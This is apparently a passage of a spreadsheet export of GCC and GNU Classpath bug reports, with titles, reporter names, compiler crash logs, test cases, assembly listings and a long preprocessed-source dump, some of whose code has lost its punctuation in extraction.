COLLECT_LTO_WRAPPER=/opt/gcc-4.7.3/libexec/gcc/x86_64-unknown-linux-gnu/4.7.3/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.7.3/configure --prefix=/opt/gcc-4.7.3 --disable-nls
Thread model: posix
gcc version 4.7.3 (GCC) 
Used command line:
/opt/gcc-4.7.3/bin/g++ -Wnon-virtual-dtor -Wreorder -Wpointer-arith -Wdisabled-optimization -Wmissing-format-attribute -Wctor-dtor-privacy -Weffc++ -Wmissing-noreturn -Winit-self -Wstrict-aliasing -Wextra -Wlogical-op -std=gnu++11 -O0 -g -g3 -ggdb -ggdb3 -pipe -fmessage-length=0 -fshow-column -funit-at-a-time -fPIC -fno-common -fstrict-aliasing -DARB_OPENGL -W -Wall -DDEBUG -DDEVEL_RALF -DARB_64 -DUNIT_TESTS -DLINUX -Wwrite-strings -Wunused -Wno-aggregate-return -Wshadow -rdynamic -Wl--export-dynamic -DFAKE_VTAB_PTR=char -DIN_ARB_GENOM_IMPORT -c GenomeImport.cxx -I. -I/home/ralf/ARB-bilbo/ARB.473/INCLUDE -I/usr/X11R6/include -save-temps</t>
  </si>
  <si>
    <t>allizgubccg</t>
  </si>
  <si>
    <t>GCC-34077</t>
  </si>
  <si>
    <t>GCC -O1 -minline-all-stringops -minline-stringops-dynamically fails for spec 2006 bzip2 gobmk and h264ref benchmarks</t>
  </si>
  <si>
    <t>I was building SPEC 2006 with the options: -minline-all-stringops -minline-stringops-dynamically in addition to my normal options.  If you use both options together GCC generates the following error:
foo.c: In function â€˜spec_random_loadâ€™:
foo.c:24: internal compiler error: in int_mode_for_mode at stor-layout.c:258
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tracing it down emit_cmp_and_jump_insns is called to compare and jump with two constant values:
Breakpoint 3 emit_cmp_and_jump_insns (x=0x2aaaadff3c50 y=0x2aaaadff3480 comparison=LTU size=0x0 mode=SImode unsignedp=1 label=0x2aaaae134fa0)
    at /proj/gcc/fsf-src/trunk/gcc/optabs.c:4428
(gdb) print x
$7 = (rtx) 0x2aaaadff3c50
(gdb) pr
(const_int 131072 [0x20000])
(gdb) print y
$8 = (rtx) 0x2aaaadff3480
(gdb) pr
(const_int 8 [0x8])
(gdb) up
#1  0x00000000008adab6 in ix86_expand_movmem (dst=0x2aaaae136a60 src=0x2aaaae136a80 count_exp=0x2aaaadff3c50 align_exp= 
    expected_align_exp= expected_size_exp=) at /proj/gcc/fsf-src/trunk/gcc/config/i386/i386.c:15362
The failure comes because integer constants have VOIDmode type rather than an integer type.
Either emit_cmp_and_jump_insns should handle the constant/constant case or ix86_expand_movemem should not call emit_cmp_and_jump_insns with constant tests.</t>
  </si>
  <si>
    <t>michael.meissner</t>
  </si>
  <si>
    <t>GCC-66978</t>
  </si>
  <si>
    <t>[6 Regression] bootstrap failure with --with-multilib-list=m32m64mx32</t>
  </si>
  <si>
    <t>On Linux/x86-64 r226113 failed to bootstrap with
--with-multilib-list=m32m64mx32:
/../../../src-trunk/libquadmath/printf/printf_fp.c: In function â€˜hack_digitâ€™:
../../../../src-trunk/libquadmath/printf/printf_fp.c:191:11: internal compiler error: in emit_move_insn at expr.c:3552
   wchar_t hack_digit (void)
           ^
0x7f789b emit_move_insn(rtx_def* rtx_def*)
        ../../src-trunk/gcc/expr.c:3551
0x8566a1 expand_function_start(tree_node*)
        ../../src-trunk/gcc/function.c:5210
0x6fc47e execute
        ../../src-trunk/gcc/cfgexpand.c:6105
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Makefile:1035: recipe for target 'printf/printf_fp.lo' failed
make[9]: *** [printf/printf_fp.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-18279</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] missing function bodies from -fdump-translation-unit</t>
  </si>
  <si>
    <t>GCC-4.0.0 has a regression in that -fdump-translation-unit no longer output
function bodies.  
Tentative patch at
  http://gcc.gnu.org/ml/gcc-bugs/2004-07/msg03341.html</t>
  </si>
  <si>
    <t>CLASSPATH-27166</t>
  </si>
  <si>
    <t>integrate DocumentFilter into AbstractDocument</t>
  </si>
  <si>
    <t>Although one can set and get the DocumentFilter on an AbstractDocument this has no effect when doing inserts removals or replacements on the text data.
The Swing book describes how the integration of DocumentFilter into AbstractDocument has to be done and this is missing in Classpath atm.</t>
  </si>
  <si>
    <t>GCC-9946</t>
  </si>
  <si>
    <t>[3.2 regression] destructor is not called for temporary object</t>
  </si>
  <si>
    <t>If expression of type 'const C' (not const reference) is passed to function accepting 'C' by value gcc 3.2.0-3.2.2 doesn't call destructor for temporary argument object.
---- The code destr.cpp:
#include 
struct C
{
    C(void)       { std::cerr C()\n }
    C(const C }
    ~C(void)      { std::cerr ~C()\n }
}
struct C2
{
    const C get(void) const { return c }
    void go(C c) {}
    C c
}
int main()
{
    C2 c2
    c2.go(c2.get())
}
---- Command line:
# g++ -O0 -o destr destr.cpp
---- Output:
~/tmp# ./destr
0xbffff604-&gt;C()
0xbffff5f4-&gt;C(0xbffff604)
0xbffff604-&gt;~C()
~/tmp#
Release:
gcc-3.2.2
Environment:
Linux linus 2.4.17-aa #6 SMP Thu Jan 3 17:53:55 EST 2002 i686 unknown
How-To-Repeat:
Returned object value should be const.
Argument should be object by value.
Compilation should be without optimization.
With optimization turned on all destructors are called correctly.</t>
  </si>
  <si>
    <t>vasilche</t>
  </si>
  <si>
    <t>GCC-35862</t>
  </si>
  <si>
    <t>[F2003] Implement new rounding modes for run time</t>
  </si>
  <si>
    <t>The front-end parsing and translation are completed.  We now need to determine how to implement UP DOWN COMPATIBLE NEAREST etc. in output_float.</t>
  </si>
  <si>
    <t>GCC-41358</t>
  </si>
  <si>
    <t>correct types for OpenBSD targets</t>
  </si>
  <si>
    <t>The attached diff updates types for OpenBSD.
ie as per http://marc.info/?l=openbsd-cvs&amp;m=113717477200754&amp;w=2 
size_t ssize_t intptr_t and uintptr_t have been standardised across all OpenBSD platforms for several years.</t>
  </si>
  <si>
    <t>jsg</t>
  </si>
  <si>
    <t>GCC-42556</t>
  </si>
  <si>
    <t>Unnecessary generation of a zero initializer for array with C++</t>
  </si>
  <si>
    <t>This is distilled from PR42500. The same testcase doesn't show a problem if compiled with a C compiler only.
Why does the gimple for the following testcase contain ? 
extern C void foo(int a[4])
extern C void bar(int a int b int c int d)
{
  int v[4] = { a b c d}
     foo(v)
     foo(v)
}
in .004t.gimple
void bar(int int int int) (int a int b int c int d)
{
  int v[4]
  v = {}
  v[0] = a
  v[1] = b
  v[2] = c
  v[3] = d
  foo (
  foo (
}
even when all members of the array have been initialized  in your original testcase. I wonder if this can be eliminated as a part of the lowering process to GIMPLE in the C++ frontend rather than any other place. 
At -O2 the RTL optimizers remove 2 of the stores but there are unnecessary stores of 0 to memory locations at [sp+8]  [sp+12] and the code generated is as follows. (Instructions marked A and B below).
bar:
        stmfd   sp! {r4 lr}
        .save {r4 lr}
.LCFI0:
        .pad #16
        sub     sp sp #16
.LCFI1:
        mov     lr #0
        add     ip sp #8
        str     lr [ip] #4  // A
        str     r0 [sp #0] 
        mov     r0 sp
        str     lr [ip #0]  // B
        stmib   sp {r1 r2 r3}        @ phole stm
        bl      foo
        mov     r0 sp
        mov     r4 sp             
        bl      foo
        add     sp sp #16
        ldmfd   sp! {r4 lr}
        bx      lr
At -Os because the zero initializer is in the form of a memset - the RTL optimizers don't remove anything and the code generated is as follows. 
bar:
        .fnstart
.LFB0:
        @ args = 0 pretend = 0 frame = 16
        @ frame_needed = 0 uses_anonymous_args = 0
        stmfd   sp! {r0 r1 r2 r3 r4 r5 r6 r7 r8 lr}
        .save {r0 r1 r2 r3 r4 r5 r6 r7 r8 lr}
.LCFI0:
        mov     r6 r0
        mov     r5 r1
        mov     r4 r2
        mov     r1 #0
        mov     r2 #16
        mov     r0 sp
        mov     r8 r3
        bl      memset
        mov     r0 sp
        str     r6 [sp #0]
        str     r5 [sp #4]
        mov     r7 sp
        str     r4 [sp #8]
        str     r8 [sp #12]
        bl      foo
        mov     r0 sp
        bl      foo
        ldmfd   sp! {r0 r1 r2 r3 r4 r5 r6 r7 r8 pc}
If I change the testcase to use the extended initializer list in c++0x and gnu++0x . There is an unnecessary move from sp to r4 but that is the subject of PR42500.
void foo(int a[4])
void bar(int a int b int c int d)
{
  int v[4] 
  v = { a b c d}
     foo(v)
     foo(v)
}
bar:
        .fnstart
.LFB0:
        @ args = 0 pretend = 0 frame = 16
        @ frame_needed = 0 uses_anonymous_args = 0
        stmfd   sp! {r0 r1 r2 r3 r4 lr}
        .save {r0 r1 r2 r3 r4 lr}
.LCFI0:
        str     r0 [sp #0]
        mov     r0 sp
        stmib   sp {r1 r2 r3}        @ phole stm
        bl      foo
        mov     r0 sp
        mov     r4 sp
        bl      foo
        ldmfd   sp! {r0 r1 r2 r3 r4 pc}
.LFE0:
        .fnend
cheers
Ramana</t>
  </si>
  <si>
    <t>GCC-25009</t>
  </si>
  <si>
    <t>Bootstrap: Failure to build doc/gcc.info</t>
  </si>
  <si>
    <t>Today's CVS (pardon SVN):
gmake[3]: Entering directory `/usr/home/mckelvey/software/gcc-obj/gcc'
gmake[3]: Nothing to be done for `all'.
gmake[3]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/gcc'
if [ xinfo = xinfo ] then \
        makeinfo --split-size=5000000 --no-split -I . -I ../../gcc/gcc/doc \
                -I ../../gcc/gcc/doc/include -o doc/gcc.info ../../gcc/gcc/doc/gcc.texi \
fi
../../gcc/gcc/doc/invoke.texi:1057: @include `@value{srcdir}/../libiberty/at-file.texi': No such file or directory.
makeinfo: Removing output file `doc/gcc.info' due to errors use --force to preserve.
gmake[2]: *** [doc/gcc.info] Error 2
gmake[2]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/gcc'
gmake[1]: *** [stage1_build] Error 2
gmake[1]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/gcc'
gmake: *** [bootstrap] Error 2
alpha1:PD&gt;uname -a
Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown
alpha1:PD&gt;gcc -v
Using built-in specs.
Target: alphaev56-unknown-linux-gnu
Configured with: ../gcc/configure --verbose --enable-languages=c++ --disable-nls
Thread model: posix
gcc version 4.1.0 20050924 (experimental)
alpha1:PD&gt;alias CONFIGURECVS
alias CONFIGURECVS='../gcc/configure --verbose --enable-languages=c++ --disable-nls &gt;clog 2&gt;&amp;1 &amp;'
alpha1:PD&gt;alias BUILD
alias BUILD='nice gmake CFLAGS='\'''\'' BOOT_CFLAGS='\'''\'' LIBCFLAGS='\''-g'\'' LIBCXXFLAGS='\''-g'\'' bootstrap &gt;log 2&gt;&amp;1 &amp;'</t>
  </si>
  <si>
    <t>GCC-3349</t>
  </si>
  <si>
    <t>bug in map::insert(pt)</t>
  </si>
  <si>
    <t>When inserting a element in a std::map using insert(pt)
find() doesn't find it.  Here is a short test program that
illustrates the bug which is present also on Solaris :
Release:
3.0
Environment:
System: Linux zosma 2.2.18 #1 SMP Wed Jan 17 10:27:51 MET 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /u/zosma/0/prisme/spion/gcc/gcc/configure --enable-languages=c++ --prefix=/u/zosma/0/prisme/spion/gcc/Linux_CVS
How-To-Repeat:
#include 
int main() {
  typedef std::map Map
  Map M
  Map::iterator hint
  hint = M.insert(Map::value_type(7 0)).first // insert (70)
  // If you don't use the hint for insert() then it works.
  M.insert(hint Map::value_type(8 1)) // insert (81)
  // M.insert(Map::value_type(8 1)) // insert (81)
  if (M.find(7) == M.end())
    abort()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-13334</t>
  </si>
  <si>
    <t>Bootstrap failure: libiberty/fibheap.c: LONG_MIN undeclared</t>
  </si>
  <si>
    <t>Hello 
I see this if I try to bootstrap with --disable-threads:
 /home/rasky/gcc/mainline/out/gcc/xgcc -B/home/rasky/gcc/mainline/out/gcc/ -
B/home/rasky/gcc/mainline/install//i686-pc-linux-gnu/bin/ -
B/home/rasky/gcc/mainline/install//i686-pc-linux-gnu/lib/ -
isystem /home/rasky/gcc/mainline/install//i686-pc-linux-gnu/include -
isystem /home/rasky/gcc/mainline/install//i686-pc-linux-gnu/sys-include -c -
DHAVE_CONFIG_H -O2 -O2 -fomit-frame-pointer -fstrict-aliasing -march=athlon-
tbird -mcpu=athlon-tbird -DNDEBUG -pipe -I. -
I../../../gcc/libiberty/../include  -W -Wall -Wtraditional -pedantic -
fpic ../../../gcc/libiberty/fibheap.c -o pic/fibheap.o \
else true fi
`-mcpu=' is deprecated. Use `-mtune=' or '-march=' instead.
../../../gcc/libiberty/fibheap.c: In function `fibheap_delete_node':
../../../gcc/libiberty/fibheap.c:285: error: `LONG_MIN' undeclared (first use 
in this function)
../../../gcc/libiberty/fibheap.c:285: error: (Each undeclared identifier is 
reported only once
../../../gcc/libiberty/fibheap.c:285: error: for each function it appears in.)
rasky@trinity:~/gcc/mainline/out$ /home/rasky/gcc/mainline/out/gcc/xgcc -v
Reading specs from /home/rasky/gcc/mainline/install//lib/gcc/i686-pc-linux-
gnu/3.4/specs
Configured with: ../gcc/configure --prefix=/home/rasky/gcc/mainline/install/ --
enable-languages=cc++java --enable-shared --disable-threads --with-system-
zlib --enable-__cxa_atexit --disable-multilib
Thread model: single
gcc version 3.4 20031206 (experimental)
My binutils *IS* new:
rasky@trinity:~/gcc/mainline/out$ ld -v
GNU ld version 2.14.90.0.6 20030820
This bug has been reported a few times on different systems without 
satisfatory answers:
http://gcc.gnu.org/ml/gcc/2002-06/msg00922.html (powerpc-eabisim)
http://gcc.gnu.org/ml/gcc/2003-08/msg01634.html (on the cs-branch) (!)
PR/12708 (which was incorrectly closed as duplicate of this but the user DID 
have a new binutils).
This system is RH9 btw.</t>
  </si>
  <si>
    <t>GCC-29663</t>
  </si>
  <si>
    <t>[4.3 Regression] FAIL: g++.old-deja/g++.abi/cxa_vec.C execution test</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.3/objdir/gcc/testsuite/g++/../../g++ -B/home
/dave/gcc-4.3/objdir/gcc/testsuite/g++/../../ /home/dave/gcc-4.3/gcc/gcc/testsui
te/g++.old-deja/g++.abi/cxa_vec.C  -nostdinc++ -I/home/dave/gcc-4.3/objdir/hppa-
linux/libstdc++-v3/include/hppa-linux -I/home/dave/gcc-4.3/objdir/hppa-linux/lib
stdc++-v3/include -I/home/dave/gcc-4.3/gcc/libstdc++-v3/libsupc++ -I/home/dave/g
cc-4.3/gcc/libstdc++-v3/include/backward -I/home/dave/gcc-4.3/gcc/libstdc++-v3/t
estsuite/util -fmessage-length=0   -ansi -pedantic-errors -Wno-long-long    -L/h
ome/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src/.libs  -L/home/dave/gcc-4.
3/objdir/hppa-linux/./libstdc++-v3/src/.libs -L/home/dave/gcc-4.3/objdir/hppa-li
nux/./libiberty  -lm   -o ./cxa_vec.exe    (timeout = 300)
PASS: g++.old-deja/g++.abi/cxa_vec.C (test for excess errors)
Setting LD_LIBRARY_PATH to .:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3
/src/.libs:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src/.libs:/home/d
ave/gcc-4.3/objdir/gcc:.:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src
/.libs:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src/.libs:/home/dave/
gcc-4.3/objdir/gcc:/home/dave/gcc-4.3/objdir/hppa-linux/libstdc++-v3/.libs:/home
/dave/gcc-4.3/objdir/hppa-linux/libmudflap/.libs:/home/dave/gcc-4.3/objdir/hppa-
linux/libssp/.libs:/home/dave/gcc-4.3/objdir/hppa-linux/libgomp/.libs:/home/dave
/gcc-4.3/objdir/./gcc:/home/dave/gcc-4.3/objdir/./prev-gcc
test 1 failed 3
test 2 failed 3
test 4 failed 3
FAIL: g++.old-deja/g++.abi/cxa_vec.C execution test</t>
  </si>
  <si>
    <t>GCC-71875</t>
  </si>
  <si>
    <t>[5 Regression] template specialization compile error</t>
  </si>
  <si>
    <t>Created attachment 38899
the code
The code is as follows:
template 
constexpr bool IsMatrix = false
// matrices
template
class Matrix {}
template 
constexpr bool IsMatrix&gt; = true
// Row-vector expanded matrix
template
class RowVecExpMatrix
template 
constexpr bool IsMatrix&gt; = true
int main()
{
    static_assert(IsMatrix&gt;&gt; Matrix check error)
    static_assert(IsMatrix&gt; Input type is not a matrix)
}
The Compile command is as follows: 
g++ --std=c++14 ./main.cpp 
When using gcc 5.4.0 or 6.1.1 the compiler complains as follows:
Error: symbol `_ZL8IsMatrix' is already defined
When using gcc 5.2 or 5.3 the code can be compiled with no error output.</t>
  </si>
  <si>
    <t>liweifriends</t>
  </si>
  <si>
    <t>GCC-20172</t>
  </si>
  <si>
    <t>Invalid non-type template parameters not diagnosed</t>
  </si>
  <si>
    <t>gcc accepts the following ill-formed code (tested with gcc3.4.2 (mingw)
and various cygwin versions (from 3.3.1 to 3.4.3 and an experimental
snapshot 4.0.0-20050130) ):
template 
struct foo{
  template 
  static void bar() { }
}
template 
foo tester(T) { return foo() }
int main(){
  tester(1.2)
  return 0
}
std:14.7.1/1 says
... The implicit instantiation of a class template specialization causes the
    implicit instantiation of the declarations but not of the definitions or
    default arguments of the class member functions member classes static
    data members and _member_templates_ ...
Thus the implicit instantiation of struct foo causes the
instantiation of declaration
    template  void foo::bar()
which is ill-formed and should be diagnosed.
Remark 1:
    The signature of bar is unimportant it just has to be a function.
    If one declares a nested template  struct S gcc correctly
    complains when instantiating foo.
Remark 2:
    Shorter testcase consists of a declaration of the template foo and an
    explicit instantiation of foo but the wording for implicit
    instantiation is much cleaner in this case so I decided to use it.
Regards
Vladimir Marko</t>
  </si>
  <si>
    <t>SWElef</t>
  </si>
  <si>
    <t>GCC-14585</t>
  </si>
  <si>
    <t xml:space="preserve">Crash with still-not-debugged code.
Environment:
System: Linux vougeot 2.4.25 #1 mer fÃ©v 25 00:57:01 CET 2004 i686 GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
# 1 test_fifo.cc
# 1 fifo.h 1
# 1 /usr/include/stdint.h 1 3
# 1 /usr/include/features.h 1 3
# 142 /usr/include/features.h 3
# 208 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 65 /usr/include/sys/cdefs.h 3
# 283 /usr/include/features.h 2 3
# 1 /usr/include/gnu/stubs.h 1 3
# 312 /usr/include/features.h 2 3
# 26 /usr/include/stdint.h 2 3
# 1 /usr/include/bits/wchar.h 1 3
# 27 /usr/include/stdint.h 2 3
# 1 /usr/include/bits/wordsize.h 1 3
# 28 /usr/include/stdint.h 2 3
typedef signed char		int8_t
typedef short int		int16_t
typedef int			int32_t
__extension__
typedef long long int		int64_t
typedef unsigned char		uint8_t
typedef unsigned short int	uint16_t
typedef unsigned int		uint32_t
__extension__
typedef unsigned long long int	uint64_t
typedef signed char		int_least8_t
typedef short int		int_least16_t
typedef int			int_least32_t
__extension__
typedef long long int		int_least64_t
typedef unsigned char		uint_least8_t
typedef unsigned short int	uint_least16_t
typedef unsigned int		uint_least32_t
__extension__
typedef unsigned long long int	uint_least64_t
typedef signed char		int_fast8_t
typedef int			int_fast16_t
typedef int			int_fast32_t
__extension__
typedef long long int		int_fast64_t
typedef unsigned char		uint_fast8_t
typedef unsigned int		uint_fast16_t
typedef unsigned int		uint_fast32_t
__extension__
typedef unsigned long long int	uint_fast64_t
typedef int			intptr_t
typedef unsigned int		uintptr_t
__extension__
typedef long long int		intmax_t
__extension__
typedef unsigned long long int	uintmax_t
# 282 /usr/include/stdint.h 3
# 318 /usr/include/stdint.h 3
# 26 fifo.h 2
class Fifo
{
  private:
    static const uint32_t maxsize
    uint32_t readpos			 
    uint32_t writepos			 
    uint32_t occupation			 
    static const int WARNING_ALMOST_EMPTY	 
    static const int WARNING_ALMOST_FULL	 
    static const int CORRECT	 
    uint8_t datas[maxsize] 		 
  public:
    Fifo ()
    ~Fifo () 
    int getStatus (void) const
    bool write (uint8_t *data int size)
    bool read (uint8_t *data int size)
}
# 24 test_fifo.cc 2
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/iostream 1 3
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/iostream.h 1 3
#pragma interface
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/streambuf.h 1 3
#pragma interface
extern C {
# 1 /usr/include/libio.h 1 3
# 1 /usr/include/_G_config.h 1 3
# 1 /usr/include/bits/types.h 1 3
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 1 3
# 19 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 61 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 131 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
typedef unsigned int size_t
# 271 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 283 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 317 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 29 /usr/include/bits/types.h 2 3
typedef unsigned char __u_char
typedef unsigned short __u_short
typedef unsigned int __u_int
typedef unsigned long __u_long
__extension__ typedef unsigned long long int __u_quad_t
__extension__ typedef long long int __quad_t
# 48 /usr/include/bits/types.h 3
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
typedef __quad_t *__qaddr_t
typedef __u_quad_t __dev_t		 
typedef __u_int __uid_t		 
typedef __u_int __gid_t		 
typedef __u_long __ino_t		 
typedef __u_int __mode_t		 
typedef __u_int __nlink_t 		 
typedef long int __off_t		 
typedef __quad_t __loff_t		 
typedef int __pid_t			 
typedef int __ssize_t			 
typedef __u_long __rlim_t		 
typedef __u_quad_t __rlim64_t		 
typedef __u_int __id_t			 
typedef struct
  {
    int __val[2]
  } __fsid_t				 
typedef int __daddr_t			 
typedef char *__caddr_t
typedef long int __time_t
typedef unsigned int __useconds_t
typedef long int __suseconds_t
typedef long int __swblk_t		 
typedef long int __clock_t
typedef int __clockid_t
typedef int __timer_t
typedef int __key_t
typedef unsigned short int __ipc_pid_t
typedef long int __blksize_t
typedef long int __blkcnt_t
typedef __quad_t __blkcnt64_t
typedef __u_long __fsblkcnt_t
typedef __u_quad_t __fsblkcnt64_t
typedef __u_long __fsfilcnt_t
typedef __u_quad_t __fsfilcnt64_t
typedef __u_quad_t __ino64_t
typedef __loff_t __off64_t
typedef long int __t_scalar_t
typedef unsigned long int __t_uscalar_t
typedef int __intptr_t
typedef unsigned int __socklen_t
# 1 /usr/include/bits/pthreadtypes.h 1 3
# 1 /usr/include/bits/sched.h 1 3
# 62 /usr/include/bits/sched.h 3
struct __sched_param
  {
    int __sched_priority
  }
# 23 /usr/include/bits/pthreadtypes.h 2 3
typedef int __atomic_lock_t
struct _pthread_fastlock
{
  long int __status    
  __atomic_lock_t __spinlock   
}
typedef struct _pthread_descr_struct *_pthread_descr
typedef struct __pthread_attr_s
{
  int __detachstate
  int __schedpolicy
  struct __sched_param __schedparam
  int __inheritsched
  int __scope
  size_t __guardsize
  int __stackaddr_set
  void *__stackaddr
  size_t __stacksize
} pthread_attr_t
typedef struct
{
  struct _pthread_fastlock __c_lock  
  _pthread_descr __c_waiting         
} pthread_cond_t
typedef struct
{
  int __dummy
} pthread_condattr_t
typedef unsigned int pthread_key_t
typedef struct
{
  int __m_reserved                
  int __m_count                   
  _pthread_descr __m_owner        
  int __m_kind                    
  struct _pthread_fastlock __m_lock  
} pthread_mutex_t
typedef struct
{
  int __mutexkind
} pthread_mutexattr_t
typedef int pthread_once_t
# 119 /usr/include/bits/pthreadtypes.h 3
# 138 /usr/include/bits/pthreadtypes.h 3
typedef unsigned long int pthread_t
# 143 /usr/include/bits/types.h 2 3
# 9 /usr/include/_G_config.h 2 3
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 1 3
# 19 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 61 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 131 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 188 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
typedef unsigned int  wint_t
# 317 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 14 /usr/include/_G_config.h 2 3
# 1 /usr/include/wchar.h 1 3
# 46 /usr/include/wchar.h 3
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 1 3
# 19 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 61 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 131 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 190 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 271 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 317 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 48 /usr/include/wchar.h 2 3
typedef struct
{
  int __count
  union
  {
    wint_t __wch
    char __wchb[4]
  } __value		 
} __mbstate_t
# 682 /usr/include/wchar.h 3
# 24 /usr/include/_G_config.h 2 3
typedef struct
{
  __off_t __pos
  __mbstate_t __state
} _G_fpos_t
typedef struct
{
  __off64_t __pos
  __mbstate_t __state
} _G_fpos64_t
# 1 /usr/include/gconv.h 1 3
# 1 /usr/include/wchar.h 1 3
# 46 /usr/include/wchar.h 3
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 1 3
# 19 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 61 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 131 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 190 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 271 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 317 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 48 /usr/include/wchar.h 2 3
# 76 /usr/include/wchar.h 3
# 682 /usr/include/wchar.h 3
# 28 /usr/include/gconv.h 2 3
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 1 3
# 19 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 61 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 131 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 188 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 269 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 283 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 317 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stddef.h 3
# 31 /usr/include/gconv.h 2 3
enum
{
  __GCONV_OK = 0
  __GCONV_NOCONV
  __GCONV_NODB
  __GCONV_NOMEM
  __GCONV_EMPTY_INPUT
  __GCONV_FULL_OUTPUT
  __GCONV_ILLEGAL_INPUT
  __GCONV_INCOMPLETE_INPUT
  __GCONV_ILLEGAL_DESCRIPTOR
  __GCONV_INTERNAL_ERROR
}
enum
{
  __GCONV_IS_LAST = 0x0001
  __GCONV_IGNORE_ERRORS = 0x0002
}
struct __gconv_step
struct __gconv_step_data
struct __gconv_loaded_object
struct __gconv_trans_data
typedef int (*__gconv_fct) (struct __gconv_step * struct __gconv_step_data *
			    __const unsigned char ** __const unsigned char *
			    unsigned char ** size_t * int int)
typedef int (*__gconv_init_fct) (struct __gconv_step *)
typedef void (*__gconv_end_fct) (struct __gconv_step *)
typedef int (*__gconv_trans_fct) (struct __gconv_step *
				  struct __gconv_step_data * void *
				  __const unsigned char *
				  __const unsigned char **
				  __const unsigned char * unsigned char **
				  size_t *)
typedef int (*__gconv_trans_context_fct) (void * __const unsigned char *
					  __const unsigned char *
					  unsigned char * unsigned char *)
typedef int (*__gconv_trans_query_fct) (__const char * __const char ***
					size_t *)
typedef int (*__gconv_trans_init_fct) (void ** const char *)
typedef void (*__gconv_trans_end_fct) (void *)
struct __gconv_trans_data
{
  __gconv_trans_fct __trans_fct
  __gconv_trans_context_fct __trans_context_fct
  __gconv_trans_end_fct __trans_end_fct
  void *__data
  struct __gconv_trans_data *__next
}
struct __gconv_step
{
  struct __gconv_loaded_object *__shlib_handle
  __const char *__modname
  int __counter
  char *__from_name
  char *__to_name
  __gconv_fct __fct
  __gconv_init_fct __init_fct
  __gconv_end_fct __end_fct
  int __min_needed_from
  int __max_needed_from
  int __min_needed_to
  int __max_needed_to
  int __stateful
  void *__data		 
}
struct __gconv_step_data
{
  unsigned char *__outbuf     
  unsigned char *__outbufend  
  int __flags
  int __invocation_counter
  int __internal_use
  __mbstate_t *__statep
